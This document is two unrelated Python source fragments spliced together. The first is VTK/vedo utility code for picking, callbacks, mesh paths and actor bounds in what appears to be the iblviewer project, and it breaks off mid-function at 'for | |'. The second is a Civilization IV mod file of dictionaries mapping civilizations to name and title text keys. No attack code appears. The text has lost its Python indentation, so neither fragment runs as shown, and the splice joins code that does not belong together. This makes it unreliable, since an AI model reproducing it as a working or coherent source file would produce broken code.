plot.renderer = plot.interactor.FindPokedRenderer(x, y)
if not plot.picker:
plot.picker = vtk.vtkPropPicker()
plot.picker.PickProp(x, y, plot.renderer)
plot.picked2d = (x,y)
xp, yp = plot.interactor.GetLastEventPosition()
actor = plot.picker.GetProp3D()
delta3d = np.array([0,0,0])
picked3d = None
picker = plot.picker
if actor is None:
# Ok, this is tricky. I found out that vtkPropPicker, even
# if it optimized, can fail at detecting a simple mesh
# so we use the vtkPicker as fall back plan
picker = vtk.vtkPicker()
picker.Pick(x, y, 0.0, plot.renderer)
actor = picker.GetProp3D()
if actor is not None:
picked3d = np.array(picker.GetPickPosition())
if isinstance(actor, vedo.Mesh):
# There is a bug with transparent objects or objects that do not have ForceOpaqueOn()
# which prevents picked3d from being valid so we have to use another picking method
cell_picker = vtk.vtkCellPicker()
cell_picker.Pick(x, y, 0.0, plot.renderer)
if cell_picker.GetProp3D() == actor:
picked3d = np.array(cell_picker.GetPickPosition())
try:
if actor.picked3d is not None:
delta3d = picked3d - actor.picked3d
actor.picked3d = picked3d
except AttributeError:
return
else:
actor = plot.picker.GetActor2D()
dx, dy = x-xp, y-yp
event_dict = vedo.utils.dotdict({
"name": event_name,
"id": cid,
"priority": priority,
"at": plot.renderers.index(plot.renderer),
"actor": actor,
"picked3d": picked3d,
"keyPressed": plot.interactor.GetKeySym(),
"picked2d": (x,y),
"delta2d": (dx, dy),
"angle2d": np.arctan2(dy,dx),
"speed2d": np.sqrt(dx*dx+dy*dy),
"delta3d": delta3d,
"speed3d": np.sqrt(np.dot(delta3d,delta3d)),
"isPoints": isinstance(actor, vedo.Points),
"isMesh": isinstance(actor, vedo.Mesh),
"isAssembly": isinstance(actor, vedo.Assembly),
"isVolume": isinstance(actor, vedo.Volume),
"isPicture": isinstance(actor, vedo.Picture),
"isActor2D": isinstance(actor, vtk.vtkActor2D)
})
return event_dict
def add_callback(plot, event_name, func, priority=0.0):
"""
Modified function from vedo. The issue is that the way vedo (and pyvista for that matter)
is structured is that it helps using vtk but sometimes hinders using it with code that makes
assumptions we don't want.
Add a function to be executed while show() is active.
Information about the event can be acquired with method ``getEvent()``.
Return a unique id for the callback.
The callback function (see example below) exposes a dictionary
Frequently used events are:
- KeyPress, KeyRelease: listen to keyboard events
- LeftButtonPress, LeftButtonRelease: listen to mouse clicks
- MiddleButtonPress, MiddleButtonRelease
- RightButtonPress, RightButtonRelease
- MouseMove: listen to mouse pointer changing position
- MouseWheelForward, MouseWheelBackward
- Enter, Leave: listen to mouse entering or leaving the window
- Pick, StartPick, EndPick: listen to object picking
- ResetCamera, ResetCameraClippingRange
- Error, Warning
- Char
- Timer
Check the complete list of events here:
https://vtk.org/doc/nightly/html/classvtkCommand.html
"""
if not plot.interactor:
return None
# Processing names is removed from vedo function
# Also the whole thing is refactored with improved picking
def wrapper(iren=None, event_name=None):
event_dict = pick_object(plot, event_name, priority, cid)
func(event_dict)
cid = plot.interactor.AddObserver(event_name, wrapper, priority)
return cid
def get_file_name(file_name, extension):
"""
Get full file name
:param file_name: File name without extension
:param extension: File extension
:return: File name with extension
"""
if str(file_name).endswith(extension):
full_file_name = str(file_name)
else:
full_file_name = str(file_name) + '.' + str(extension)
return full_file_name
def get_local_data_file_path(file_name, extension, sub_folder=''):
"""
Get data path
:param file_name: File name without extension
:param extension: File extension
:return: File path
"""
return ASSETS_FOLDER.joinpath(sub_folder, get_file_name(file_name, extension))
def get_surface_mesh_path(file_name, meshes_path=None, extension='ply', default_meshes_path=None):
"""
Get a surface mesh file path
:param file_name: File name without extension
:param meshes_path: Folder path. If None given, this method will look into the data folder of iblviewer
:param extension: File extension
:param default_meshes_path: Fallback local or remote path
:return: Full mesh file path
"""
if meshes_path is None:
region_mesh_path = str(get_local_data_file_path(file_name, extension, 'surfaces'))
if not os.path.exists(region_mesh_path):
if default_meshes_path is not None:
region_mesh_path = default_meshes_path
else:
region_mesh_path = 'https://raw.github.com/int-brain-lab/iblviewer/main/iblviewer_assets/surfaces/'
region_mesh_path += get_file_name(file_name, extension)
else:
region_mesh_path = str(os.path.join(meshes_path, get_file_name(file_name, extension)))
return region_mesh_path
def load_surface_mesh(file_name, meshes_path=None, extension='ply'):
"""
Load a surface mesh with vedo.
:param file_name: File name without extension
:param meshes_path: Folder path. If None given, this method will look into the data folder of iblviewer
:param extension: File extension
:return: Mesh or None if path is invalid
"""
file_path = get_surface_mesh_path(file_name, meshes_path, extension)
if file_path.startswith('https') or os.path.exists(file_path):
return vedo.load(file_path)
def change_file_name(file_path, prefix=None, name=None, suffix=None):
"""
Change the file name from the given file path
:param file_path: Input file path
:param prefix: Prefix to the file name
:param name: Whether a new name is set instead of the current name.
If None, the current file name is used.
:param suffix: Suffix to the file name
:return: New file path
"""
path, file_name, extension = split_path(file_path)
if prefix is None:
prefix = ''
if suffix is None:
suffix = ''
if name is None or name == '' or not isinstance(name, str):
name = file_name
return os.path.join(path, prefix + name + suffix + extension)
def split_path(path):
"""
Split any given file path to folder path, file name and extension
:return: Folder path, file name and extension
"""
base_name = os.path.basename(path)
file_name, extension = os.path.splitext(base_name)
return path[:-len(base_name)], file_name, extension
def time_diff(t):
"""
Get a time difference in seconds
:param t: Time
:return: Number of seconds
"""
now = datetime.now()
duration = now - t
return duration.total_seconds()
def recompute_normals(target):
pdnorm = vtk.vtkPolyDataNormals()
pdnorm.SetInputData(target)
pdnorm.ComputePointNormalsOn()
pdnorm.ComputeCellNormalsOn()
pdnorm.FlipNormalsOff()
pdnorm.ConsistencyOn()
pdnorm.Update()
return pdnorm.GetOutput() #self._data
def get_actor_center(actor):
"""
Get the absolute center position of an actor
:param actor: VTK actor
:return: 3d array
"""
try:
if isinstance(actor, vedo.Volume):
return actor.center() + actor.pos()
else:
return actor.centerOfMass() + actor.pos() # TODO: check that this is necessary (adding pos)
except Exception as e:
raise e
def get_actor_bounds(actor):
"""
Get the bounds of an actor as xmin, xmax, ymin, ymax, zmin, zmax
:param actor: VTK actor
:return: Array with 6 values
"""
if actor is None:
return
try:
if isinstance(actor, vedo.Volume):
d = actor.dimensions() * actor.spacing()
c = get_actor_center(actor)
return c[0] - d[0], c[0] + d[0], c[1] - d[1], c[1] + d[1], c[2] - d[2], c[2] + d[2]
else:
return actor.bounds()
except Exception as e:
raise e
def get_actor_dimensions(actor):
"""
Get the dimensions of an actor
:param actor: VTK actor
:return: 3d array
"""
if actor is None:
return
try:
if isinstance(actor, vedo.Volume):
return actor.dimensions() * actor.spacing()# equivalent to self.model.resolution
else:
xmin, xmax, ymin, ymax, zmin, zmax = actor.bounds()
return np.array([xmax - xmin, ymax - ymin, zmax - zmin])
except Exception as e:
raise e
def get_bounding_planes(actor):
"""
Get bounding planes for an actor
:param actor: VTK actor
:return: vtkPlanes
"""
planes = vtk.vtkPlanes()
planes.SetBounds(actor.GetBounds())
return planes
def get_planes_bounds(planes):
"""
Get the bounding box coordinates of a series of planes.
[WARNING] Only works for six planes (box mode) at the moment
:param planes: vtkPlaneCollection
:return: 6 values
"""
origins = list()
for | |
# coding: utf-8
from CvPythonExtensions import *
import CvUtil
import PyHelpers
from Consts import *
from Civics import *
from StoredData import data
from RFCUtils import *
from Areas import *
import CityNameManager as cnm
from Events import handler
from Locations import *
from Core import *
from Core import name as short
from Core import adjective as civAdjective
### Constants ###
encoding = "utf-8"
### Dictionaries with text keys
dDefaultInsertNames = {
iVikings : "TXT_KEY_CIV_VIKINGS_SCANDINAVIA",
iKhmer : "TXT_KEY_CIV_KHMER_KAMPUCHEA",
iNetherlands : "TXT_KEY_CIV_NETHERLANDS_ARTICLE",
iTamils : "TXT_KEY_CIV_TAMILS_TAMIL_NADU",
iMaya : "TXT_KEY_CIV_MAYA_YUCATAN",
iThailand : "TXT_KEY_CIV_THAILAND_SIAM",
iMoors : "TXT_KEY_CIV_MOORS_MOROCCO",
iMughals : "TXT_KEY_CIV_MUGHALS_DELHI",
iHarappa : "TXT_KEY_CIV_HARAPPA_INDUS",
}
dDefaultInsertAdjectives = {
iVikings : "TXT_KEY_CIV_VIKINGS_SCANDINAVIAN",
iKhmer : "TXT_KEY_CIV_KHMER_KAMPUCHEAN",
iThailand : "TXT_KEY_CIV_THAILAND_SIAMESE",
iMoors : "TXT_KEY_CIV_MOORS_MOROCCAN",
}
dSpecificVassalTitles = deepdict({
iEgypt : {
iPhoenicia : "TXT_KEY_CIV_EGYPTIAN_PHOENICIA",
iEthiopia : "TXT_KEY_CIV_EGYPTIAN_ETHIOPIA",
},
iBabylonia : {
iPhoenicia : "TXT_KEY_ADJECTIVE_TITLE",
},
iChina : {
iKorea : "TXT_KEY_CIV_CHINESE_KOREA",
iTurks : "TXT_KEY_CIV_CHINESE_TURKS",
iMongols : "TXT_KEY_CIV_CHINESE_MONGOLIA",
},
iGreece : {
iIndia : "TXT_KEY_CIV_GREEK_INDIA",
iEgypt : "TXT_KEY_CIV_GREEK_EGYPT",
iPersia : "TXT_KEY_CIV_GREEK_PERSIA",
iRome : "TXT_KEY_CIV_GREEK_ROME",
},
iIndia : {
iAztecs: "TXT_KEY_CIV_INDIAN_AZTECS",
},
iPersia : {
iEgypt : "TXT_KEY_CIV_PERSIAN_EGYPT",
iIndia : "TXT_KEY_CIV_PERSIAN_INDIA",
iBabylonia : "TXT_KEY_CIV_PERSIAN_BABYLONIA",
iGreece : "TXT_KEY_CIV_PERSIAN_GREECE",
iEthiopia : "TXT_KEY_CIV_PERSIAN_ETHIOPIA",
iArabia : "TXT_KEY_CIV_PERSIAN_ARABIA",
iMongols : "TXT_KEY_CIV_PERSIAN_MONGOLIA",
},
iJapan : {
iChina : "TXT_KEY_CIV_JAPANESE_CHINA",
iIndia : "TXT_KEY_CIV_JAPANESE_INDIA",
iKorea : "TXT_KEY_CIV_JAPANESE_KOREA",
iMongols : "TXT_KEY_CIV_JAPANESE_MONGOLIA",
},
iByzantium : {
iEgypt : "TXT_KEY_CIV_BYZANTINE_EGYPT",
iBabylonia : "TXT_KEY_CIV_BYZANTINE_BABYLONIA",
iGreece : "TXT_KEY_CIV_BYZANTINE_GREECE",
iPhoenicia : "TXT_KEY_CIV_BYZANTINE_CARTHAGE",
iPersia : "TXT_KEY_CIV_BYZANTINE_PERSIA",
iRome : "TXT_KEY_CIV_BYZANTINE_ROME",
iSpain : "TXT_KEY_CIV_BYZANTINE_SPAIN",
},
iVikings : {
iEngland : "TXT_KEY_CIV_VIKING_ENGLAND",
iRussia : "TXT_KEY_CIV_VIKING_RUSSIA",
},
iArabia : {
iOttomans : "TXT_KEY_CIV_ARABIAN_OTTOMANS",
iMughals : "TXT_KEY_CIV_ARABIAN_MUGHALS",
},
iMoors : {
iArabia : "TXT_KEY_CIV_MOORISH_ARABIA",
iMali : "TXT_KEY_CIV_MOORISH_MALI",
},
iSpain : {
iPhoenicia : "TXT_KEY_CIV_SPANISH_CARTHAGE",
iEthiopia : "TXT_KEY_CIV_SPANISH_ETHIOPIA",
iMaya : "TXT_KEY_CIV_SPANISH_MAYA",
iByzantium : "TXT_KEY_CIV_SPANISH_BYZANTIUM",
iIndonesia : "TXT_KEY_CIV_SPANISH_INDONESIA",
iMoors : "TXT_KEY_CIV_SPANISH_MOORS",
iFrance : "TXT_KEY_CIV_SPANISH_FRANCE",
iNetherlands : "TXT_KEY_ADJECTIVE_TITLE",
iMali : "TXT_KEY_CIV_SPANISH_MALI",
iPortugal : "TXT_KEY_CIV_SPANISH_PORTUGAL",
iAmerica : "TXT_KEY_CIV_SPANISH_AMERICA",
iArgentina : "TXT_KEY_CIV_SPANISH_ARGENTINA",
iColombia : "TXT_KEY_CIV_SPANISH_COLOMBIA",
},
iFrance : {
iEgypt : "TXT_KEY_MANDATE_OF",
iBabylonia : "TXT_KEY_CIV_FRENCH_BABYLONIA",
iGreece : "TXT_KEY_CIV_FRANCE_DEPARTEMENTS_OF",
iPersia : "TXT_KEY_MANDATE_OF",
iPhoenicia : "TXT_KEY_CIV_FRENCH_PHOENICIA",
iItaly : "TXT_KEY_CIV_FRENCH_ITALY",
iEthiopia : "TXT_KEY_CIV_FRENCH_ETHIOPIA",
iByzantium : "TXT_KEY_CIV_FRENCH_BYZANTIUM",
iVikings : "TXT_KEY_CIV_FRANCE_DEPARTEMENTS_OF",
iArabia : "TXT_KEY_MANDATE_OF",
iEngland : "TXT_KEY_CIV_FRENCH_ENGLAND",
iSpain : "TXT_KEY_CIV_FRENCH_SPAIN",
iHolyRome : "TXT_KEY_CIV_FRENCH_HOLY_ROME",
iRussia : "TXT_KEY_CIV_FRANCE_DEPARTEMENTS_OF",
iPoland : "TXT_KEY_CIV_FRENCH_POLAND",
iNetherlands : "TXT_KEY_CIV_FRENCH_NETHERLANDS",
iMali : "TXT_KEY_CIV_FRENCH_MALI",
iPortugal : "TXT_KEY_CIV_FRANCE_DEPARTEMENTS_OF",
iInca : "TXT_KEY_CIV_FRENCH_INCA",
iAztecs : "TXT_KEY_CIV_FRENCH_AZTECS",
iMughals : "TXT_KEY_MANDATE_OF",
iCongo : "TXT_KEY_ADJECTIVE_TITLE",
iOttomans : "TXT_KEY_MANDATE_OF",
iAmerica : "TXT_KEY_CIV_FRENCH_AMERICA",
},
iEngland : {
iEgypt : "TXT_KEY_MANDATE_OF",
iIndia : "TXT_KEY_CIV_ENGLISH_INDIA",
iBabylonia : "TXT_KEY_CIV_ENGLISH_BABYLONIA",
iPersia : "TXT_KEY_MANDATE_OF",
iPhoenicia : "TXT_KEY_CIV_ENGLISH_PHOENICIA",
iEthiopia : "TXT_KEY_CIV_ENGLISH_ETHIOPIA",
iMaya : "TXT_KEY_CIV_ENGLISH_MAYA",
iByzantium : "TXT_KEY_CIV_ENGLISH_BYZANTIUM",
iVikings : "TXT_KEY_CIV_ENGLISH_VIKINGS",
iArabia : "TXT_KEY_MANDATE_OF",
iIndonesia : "TXT_KEY_CIV_ENGLISH_INDONESIA",
iFrance : "TXT_KEY_CIV_ENGLISH_FRANCE",
iHolyRome : "TXT_KEY_CIV_ENGLISH_HOLY_ROME",
iGermany : "TXT_KEY_CIV_ENGLISH_GERMANY",
iNetherlands : "TXT_KEY_CIV_ENGLISH_NETHERLANDS",
iMali : "TXT_KEY_CIV_ENGLISH_MALI",
iOttomans : "TXT_KEY_MANDATE_OF",
iAmerica : "TXT_KEY_CIV_ENGLISH_AMERICA",
},
iHolyRome : {
iItaly : "TXT_KEY_CIV_HOLY_ROMAN_ITALY",
iFrance : "TXT_KEY_CIV_HOLY_ROMAN_FRANCE",
iNetherlands : "TXT_KEY_CIV_HOLY_ROMAN_NETHERLANDS",
iByzantium : "TXT_KEY_CIV_HOLY_ROMAN_BYZANTIUM",
iPoland : "TXT_KEY_CIV_HOLY_ROMAN_POLAND",
},
iRussia : {
iTurks : "TXT_KEY_ADJECTIVE_TITLE",
iPoland : "TXT_KEY_CIV_RUSSIAN_POLAND",
iAmerica : "TXT_KEY_ADJECTIVE_TITLE",
},
iNetherlands : {
iIndonesia : "TXT_KEY_CIV_DUTCH_INDONESIA",
iMali : "TXT_KEY_CIV_DUTCH_MALI",
iEthiopia : "TXT_KEY_CIV_DUTCH_ETHIOPIA",
iCongo : "TXT_KEY_CIV_DUTCH_CONGO",
iAmerica : "TXT_KEY_CIV_DUTCH_AMERICA",
iBrazil : "TXT_KEY_CIV_DUTCH_BRAZIL",
},
iPortugal : {
iIndia : "TXT_KEY_CIV_PORTUGUESE_INDIA",
iIndonesia : "TXT_KEY_CIV_PORTUGUESE_INDIA",
iMali : "TXT_KEY_CIV_PORTUGUESE_MALI",
iCongo : "TXT_KEY_CIV_PORTUGUESE_CONGO",
iBrazil : "TXT_KEY_CIV_PORTUGUESE_BRAZIL",
},
iMongols : {
iEgypt : "TXT_KEY_CIV_MONGOL_ILKHANATE",
iChina : "TXT_KEY_CIV_MONGOL_CHINA",
iBabylonia : "TXT_KEY_CIV_MONGOL_BABYLONIA",
iGreece : "TXT_KEY_CIV_MONGOL_ILKHANATE",
iPersia : "TXT_KEY_CIV_MONGOL_ILKHANATE",
iPhoenicia : "TXT_KEY_CIV_MONGOL_PHOENICIA",
iRome : "TXT_KEY_CIV_MONGOL_ILKHANATE",
iByzantium : "TXT_KEY_CIV_MONGOL_BYZANTIUM",
iRussia : "TXT_KEY_CIV_MONGOL_RUSSIA",
iOttomans : "TXT_KEY_CIV_MONGOL_OTTOMANS",
iMughals : "TXT_KEY_CIV_MONGOL_MUGHALS",
},
iMughals : {
iIndia : "TXT_KEY_CIV_MUGHAL_INDIA",
},
iOttomans : {
iEgypt : "TXT_KEY_CIV_OTTOMAN_EGYPT",
iBabylonia : "TXT_KEY_CIV_OTTOMAN_BABYLONIA",
iPersia : "TXT_KEY_CIV_OTTOMAN_PERSIA",
iGreece : "TXT_KEY_CIV_OTTOMAN_GREECE",
iPhoenicia : "TXT_KEY_CIV_OTTOMAN_PHOENICIA",
iEthiopia : "TXT_KEY_CIV_OTTOMAN_ETHIOPIA",
iByzantium : "TXT_KEY_CIV_OTTOMAN_BYZANTIUM",
iArabia : "TXT_KEY_CIV_OTTOMAN_ARABIA",
iIndonesia : "TXT_KEY_CIV_OTTOMAN_INDONESIA",
iRussia : "TXT_KEY_CIV_OTTOMAN_RUSSIA",
},
iGermany : {
iHolyRome : "TXT_KEY_CIV_GERMAN_HOLY_ROME",
iMali : "TXT_KEY_CIV_GERMAN_MALI",
iEthiopia : "TXT_KEY_CIV_GERMAN_ETHIOPIA",
iPoland : "TXT_KEY_CIV_GERMAN_POLAND",
},
iAmerica : {
iEngland : "TXT_KEY_CIV_AMERICAN_ENGLAND",
iJapan : "TXT_KEY_CIV_AMERICAN_JAPAN",
iGermany : "TXT_KEY_CIV_AMERICAN_GERMANY",
iAztecs : "TXT_KEY_CIV_AMERICAN_MEXICO",
iMaya : "TXT_KEY_CIV_AMERICAN_MAYA",
iKorea : "TXT_KEY_CIV_AMERICAN_KOREA",
},
iBrazil : {
iArgentina : "TXT_KEY_CIV_BRAZILIAN_ARGENTINA",
},
})
dMasterTitles = {
iChina : "TXT_KEY_CIV_CHINESE_VASSAL",
iIndia : "TXT_KEY_CIV_INDIAN_VASSAL",
iPersia : "TXT_KEY_CIV_PERSIAN_VASSAL",
iRome : "TXT_KEY_CIV_ROMAN_VASSAL",
iJapan : "TXT_KEY_CIV_JAPANESE_VASSAL",
iByzantium : "TXT_KEY_CIV_BYZANTINE_VASSAL",
iTurks : "TXT_KEY_CIV_TURKIC_VASSAL",
iArabia : "TXT_KEY_CIV_ARABIAN_VASSAL",
iTibet : "TXT_KEY_CIV_TIBETAN_VASSAL",
iIndonesia : "TXT_KEY_CIV_INDONESIAN_VASSAL",
iMoors : "TXT_KEY_CIV_ARABIAN_VASSAL",
iSpain : "TXT_KEY_CIV_SPANISH_VASSAL",
iFrance : "TXT_KEY_ADJECTIVE_TITLE",
iEngland : "TXT_KEY_CIV_ENGLISH_VASSAL",
iRussia : "TXT_KEY_CIV_RUSSIAN_VASSAL",
iNetherlands : "TXT_KEY_ADJECTIVE_TITLE",
iPortugal : "TXT_KEY_ADJECTIVE_TITLE",
iMongols : "TXT_KEY_CIV_MONGOL_VASSAL",
iMughals : "TXT_KEY_CIV_MUGHAL_VASSAL",
iOttomans : "TXT_KEY_CIV_OTTOMAN_VASSAL",
iThailand : "TXT_KEY_CIV_THAI_VASSAL",
}
dCommunistVassalTitlesGeneric = {
iRussia : "TXT_KEY_CIV_RUSSIA_SOVIET",
}
dCommunistVassalTitles = deepdict({
iRussia : {
iChina : "TXT_KEY_CIV_RUSSIA_SOVIET_REPUBLIC_ADJECTIVE",
iTurks : "TXT_KEY_CIV_RUSSIA_SOVIET_TURKS",
iJapan : "TXT_KEY_CIV_RUSSIA_SOVIET_JAPAN",
iOttomans : "TXT_KEY_CIV_RUSSIA_SOVIET_OTTOMANS",
iGermany : "TXT_KEY_CIV_RUSSIA_SOVIET_GERMANY",
},
})
dFascistVassalTitlesGeneric = {
iGermany : "TXT_KEY_ADJECTIVE_TITLE"
}
dFascistVassalTitles = deepdict({
iGermany : {
iEgypt : "TXT_KEY_CIV_GERMANY_REICHSPROTEKTORAT",
iChina : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
iGreece : "TXT_KEY_CIV_GERMANY_NAZI_GREECE",
iPhoenicia : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
iRome : "TXT_KEY_CIV_GERMANY_REICHSPROTEKTORAT",
iEthiopia : "TXT_KEY_CIV_GERMANY_NAZI_ETHIOPIA",
iByzantium : "TXT_KEY_CIV_GERMANY_NAZI_BYZANTIUM",
iSpain : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
iFrance : "TXT_KEY_CIV_GERMANY_NAZI_FRANCE",
iEngland : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
iHolyRome : "TXT_KEY_CIV_GERMANY_NAZI_HOLY_ROME",
iRussia : "TXT_KEY_CIV_GERMANY_NAZI_RUSSIA",
iNetherlands : "TXT_KEY_CIV_GERMANY_NAZI_NETHERLANDS",
iMali : "TXT_KEY_CIV_GERMANY_NAZI_MALI",
iPoland : "TXT_KEY_CIV_GERMANY_NAZI_POLAND",
iPortugal : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
iMughals : "TXT_KEY_CIV_GERMANY_NAZI_MUGHALS",
iOttomans : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
iCanada : "TXT_KEY_CIV_GERMANY_NAZI_CANADA",
},
})
dForeignAdjectives = deepdict({
iChina : {
iEgypt : "TXT_KEY_CIV_CHINESE_ADJECTIVE_EGYPT",
iIndia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_INDIA",
iBabylonia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_BABYLONIA",
iPersia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_PERSIA",
iRome : "TXT_KEY_CIV_CHINESE_ADJECTIVE_ROME",
iJapan : "TXT_KEY_CIV_CHINESE_ADJECTIVE_JAPAN",
iKorea : "TXT_KEY_CIV_CHINESE_ADJECTIVE_KOREA",
iByzantium : "TXT_KEY_CIV_CHINESE_ADJECTIVE_BYZANTIUM",
iArabia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_ARABIA",
iKhmer : "TXT_KEY_CIV_CHINESE_ADJECTIVE_KHMER",
iIndonesia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_INDONESIA",
iMongols : "TXT_KEY_CIV_CHINESE_ADJECTIVE_MONGOLIA",
iOttomans : "TXT_KEY_CIV_CHINESE_ADJECTIVE_OTTOMANS",
iTibet : "TXT_KEY_CIV_CHINESE_ADJECTIVE_TIBET",
},
})
dForeignNames = deepdict({
iGreece : {
iTurks : "TXT_KEY_CIV_GREEK_NAME_TURKS",
},
iPersia : {
iByzantium : "TXT_KEY_CIV_PERSIAN_NAME_BYZANTIUM",
iTurks : "TXT_KEY_CIV_PERSIAN_NAME_TURKS",
iIndonesia : "TXT_KEY_CIV_PERSIAN_NAME_INDONESIA",
},
iRome : {
iEgypt : "TXT_KEY_CIV_ROMAN_NAME_EGYPT",
iChina : "TXT_KEY_CIV_ROMAN_NAME_CHINA",
iBabylonia : "TXT_KEY_CIV_ROMAN_NAME_BABYLONIA",
iGreece : "TXT_KEY_CIV_ROMAN_NAME_GREECE",
iPersia : "TXT_KEY_CIV_ROMAN_NAME_PERSIA",
iPhoenicia : "TXT_KEY_CIV_ROMAN_NAME_PHOENICIA",
iEthiopia : "TXT_KEY_CIV_ROMAN_NAME_ETHIOPIA",
iByzantium : "TXT_KEY_CIV_ROMAN_NAME_BYZANTIUM",
iVikings : "TXT_KEY_CIV_ROMAN_NAME_VIKINGS",
iTurks : "TXT_KEY_CIV_ROMAN_NAME_TURKS",
iKhmer : "TXT_KEY_CIV_ROMAN_NAME_KHMER",
iSpain : "TXT_KEY_CIV_ROMAN_NAME_SPAIN",
iFrance : "TXT_KEY_CIV_ROMAN_NAME_FRANCE",
iEngland : "TXT_KEY_CIV_ROMAN_NAME_ENGLAND",
iHolyRome : "TXT_KEY_CIV_ROMAN_NAME_HOLY_ROME",
iGermany : "TXT_KEY_CIV_ROMAN_NAME_GERMANY",
iRussia : "TXT_KEY_CIV_ROMAN_NAME_RUSSIA",
iNetherlands : "TXT_KEY_CIV_ROMAN_NAME_NETHERLANDS",
iMali : "TXT_KEY_CIV_ROMAN_NAME_MALI",
iPortugal : "TXT_KEY_CIV_ROMAN_NAME_PORTUGAL",
iMongols : "TXT_KEY_CIV_ROMAN_NAME_MONGOLIA",
iOttomans : "TXT_KEY_CIV_ROMAN_NAME_OTTOMANS",
iThailand : "TXT_KEY_CIV_ROMAN_NAME_THAILAND",
},
iArabia : {
iEgypt : "TXT_KEY_CIV_ARABIAN_NAME_EGYPT",
iBabylonia : "TXT_KEY_CIV_ARABIAN_NAME_BABYLONIA",
iPersia : "TXT_KEY_CIV_ARABIAN_NAME_PERSIA",
iPhoenicia : "TXT_KEY_CIV_ARABIAN_NAME_CARTHAGE",
iRome : "TXT_KEY_CIV_ARABIAN_NAME_ROME",
iEthiopia : "TXT_KEY_CIV_ARABIAN_NAME_ETHIOPIA",
iByzantium : "TXT_KEY_CIV_ARABIAN_NAME_BYZANTIUM",
iTurks : "TXT_KEY_CIV_ARABIAN_NAME_TURKS",
iArabia : "TXT_KEY_CIV_ARABIAN_NAME_ARABIA",
iIndonesia : "TXT_KEY_CIV_ARABIAN_NAME_INDONESIA",
iMoors : "TXT_KEY_CIV_ARABIAN_NAME_MOORS",
iSpain : "TXT_KEY_CIV_ARABIAN_NAME_SPAIN",
iPortugal : "TXT_KEY_CIV_ARABIAN_NAME_PORTUGAL",
},
iTibet : {
iChina : "TXT_KEY_CIV_TIBETAN_NAME_CHINA",
iIndia : "TXT_KEY_CIV_TIBETAN_NAME_INDIA",
iTurks : "TXT_KEY_CIV_TIBETAN_NAME_TURKS",
iMongols : "TXT_KEY_CIV_TIBETAN_NAME_MONGOLIA",
},
iMoors : {
iEgypt : "TXT_KEY_CIV_ARABIAN_NAME_EGYPT",
iBabylonia : "TXT_KEY_CIV_ARABIAN_NAME_BABYLONIA",
iPersia : "TXT_KEY_CIV_ARABIAN_NAME_PERSIA",
iPhoenicia : "TXT_KEY_CIV_ARABIAN_NAME_CARTHAGE",
iRome : "TXT_KEY_CIV_ARABIAN_NAME_ROME",
iEthiopia : "TXT_KEY_CIV_ARABIAN_NAME_ETHIOPIA",
iByzantium : "TXT_KEY_CIV_ARABIAN_NAME_BYZANTIUM",
iArabia : "TXT_KEY_CIV_ARABIAN_NAME_ARABIA",
iMoors : "TXT_KEY_CIV_ARABIAN_NAME_MOORS",
iSpain : "TXT_KEY_CIV_ARABIAN_NAME_SPAIN",
iPortugal : "TXT_KEY_CIV_ARABIAN_NAME_PORTUGAL",
},
iSpain : {
iKhmer : "TXT_KEY_CIV_SPANISH_NAME_KHMER",
iAztecs : "TXT_KEY_CIV_SPANISH_NAME_AZTECS",
iMughals : "TXT_KEY_CIV_SPANISH_NAME_MUGHALS",
},
iFrance : {
iKhmer : "TXT_KEY_CIV_FRENCH_NAME_KHMER",
iMughals : "TXT_KEY_CIV_FRENCH_NAME_MUGHALS",
},
iEngland : {
iKhmer : "TXT_KEY_CIV_ENGLISH_NAME_KHMER",
iMughals : "TXT_KEY_CIV_ENGLISH_NAME_MUGHALS",
},
iRussia : {
iPersia : "TXT_KEY_CIV_RUSSIAN_NAME_PERSIA",
},
iMongols : {
iTurks : "TXT_KEY_CIV_MONGOL_NAME_TURKS"
},
iGermany : {
iMoors : "TXT_KEY_CIV_GERMAN_NAME_MOORS",
},
})
lRepublicOf = [iEgypt, iIndia, iChina, iPersia, iJapan, iEthiopia, iKorea, iVikings, iTurks, iTibet, iIndonesia, iKhmer, iHolyRome, iMali, iPoland, iMughals, iOttomans, iThailand]
lRepublicAdj = [iBabylonia, iRome, iMoors, iSpain, iFrance, iPortugal, iInca, iItaly, iAztecs, iArgentina]
lSocialistRepublicOf = [iMoors, iHolyRome, iBrazil, iVikings]
lSocialistRepublicAdj = [iPersia, iTurks, iItaly, iAztecs, iArgentina]
lPeoplesRepublicOf = [iIndia, iChina, iPolynesia, iJapan, iTibet, iIndonesia, iMali, iPoland, iMughals, iThailand, iCongo]
lPeoplesRepublicAdj = [iTamils, iByzantium, iMongols]
lIslamicRepublicOf = [iIndia, iPersia, iMali, iMughals]
dEmpireThreshold = {
iCarthage : 4,
iIndonesia : 4,
iKorea : 4,
iRussia : 8,
iHolyRome : 3,
iGermany : 4,
iItaly : 4,
iInca : 3,
iMongols : 8,
iPoland : 3,
iMoors : 3,
iTibet : 2,
iPolynesia : 3,
iTamils : 3,
iIran : 4,
}
lChristianity = [iCatholicism, iOrthodoxy, iProtestantism]
lRespawnNameChanges = [iHolyRome, iInca, iAztecs, iMali] # TODO: this should be covered by period
lVassalNameChanges = [iInca, iAztecs, iMughals] # TODO: this should be covered by period
lChristianityNameChanges = [iInca, iAztecs] # TODO: this should be covered by period
lColonies = [iMali, iEthiopia, iCongo, iAztecs, iInca, iMaya] # TODO: could be covered by more granular continental regions
dNameChanges = { # TODO: this should be covered by period
iPhoenicia : "TXT_KEY_CIV_CARTHAGE_SHORT_DESC",
iAztecs : "TXT_KEY_CIV_MEXICO_SHORT_DESC",
iInca : "TXT_KEY_CIV_PERU_SHORT_DESC",
iHolyRome : "TXT_KEY_CIV_AUSTRIA_SHORT_DESC",
iMali : "TXT_KEY_CIV_SONGHAI_SHORT_DESC",
iMughals : "TXT_KEY_CIV_PAKISTAN_SHORT_DESC",
iVikings : "TXT_KEY_CIV_SWEDEN_SHORT_DESC",
iMoors : "TXT_KEY_CIV_MOROCCO_SHORT_DESC",
}
